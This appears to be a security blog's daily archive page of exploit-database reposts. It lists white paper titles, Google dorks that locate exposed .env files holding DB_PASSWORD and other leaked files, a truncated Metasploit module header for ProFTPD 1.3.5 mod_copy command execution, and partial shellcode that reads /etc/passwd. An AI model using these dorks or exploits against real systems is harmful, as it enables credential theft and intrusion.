Daily Archives: June 23, 2015

Home » June 2015 » Archives for June 23, 2015

White Paper: Developing MIPS Exploits to Hack Routers

Title: Developing MIPS Exploits to Hack Routers
Author: Onur Alanbel


By |June 23rd, 2015|White Papers|

White Paper: Privilege Escalation via Client Management Software

Title: Privilege Escalation via Client Management Software

Author: SySS GmbH


By |June 23rd, 2015|White Papers|

GHDB – intext:DB_PASSWORD ext:env

Google dork Description: intext:DB_PASSWORD ext:env

Google search: intext:DB_PASSWORD ext:env

Submited: 2015-05-29

This dork finds env files, usually used in Laravel configuration,
containing passwords and other juicy information.

Author: Augusto Pereira

By |June 23rd, 2015|Files containing passwords|

GHDB – inurl:/dbg-wizard.php

Google dork Description: inurl:/dbg-wizard.php

Google search: inurl:/dbg-wizard.php

Submited: 2015-06-03

# Exploit Title: Nusphere PHP DBG wizard
# Date: 02-06-2015
# Vendor Homepage: http://www.nusphere.com
# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm
# Version: any
# Exploit Author: Alfred Armstrong
# Contact: http://twitter.com/alfaguru
# Website: http://figure-w.co.uk

DBG Wizard is meant to be used with the DBG PHP debugger as an aid to
configuring it correctly. It is supplied as a PHP script […]

By |June 23rd, 2015|Files containing juicy info|

GHDB – intitle:”index of” “onetoc2” “one”

Google dork Description: intitle:”index of” “onetoc2” “one”

Google search: intitle:”index of” “onetoc2” “one”

Submited: 2015-06-04

# Exploit Title: intitle:”index of” “onetoc2” “one”
# Google Dork: intitle:”index of” “onetoc2” “one”
# Date: 04/06/2015
# Exploit Author: Sphearis
# Vendor Homepage: NA
# Software Link: NA
# Version: NA
# Tested on: ALL
# CVE : NA

This dork allows you to see Onenote files stored in the open(*.one). […]

By |June 23rd, 2015|Sensitive Directories|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

Advanced Ethical Hacking Institute in Pune
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
      ‘Name’           => ‘ProFTPD 1.3.5 Mod_Copy Command Execution’,
      ‘Description’    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|

Shellcode: Linux/x86 – /etc/passwd Reader (58 bytes)

Advanced Ethical Hacking Institute in Pune

Linux/x86 – /etc/passwd Reader – 58 bytes

#Greetz : Bomberman(Leader),wiremask.eu
#Author : B3mB4m

#File descriptor on EBX
#Buffer on ECX
#Bytes to read on EDX

Disassembly of section .text:

08048060 <.text>:
 8048060:    31 c9                    xor    %ecx,%ecx
 8048062:    31 c0                    xor    %eax,%eax
 8048064:    31 d2                    xor    %edx,%edx
 8048066:    51                       push   %ecx
 8048067:    b0 05                    mov    $0x5,%al
 8048069:    68 73 73 77 64           push   $0x64777373
 804806e:    68 […]

By |June 23rd, 2015|Exploits|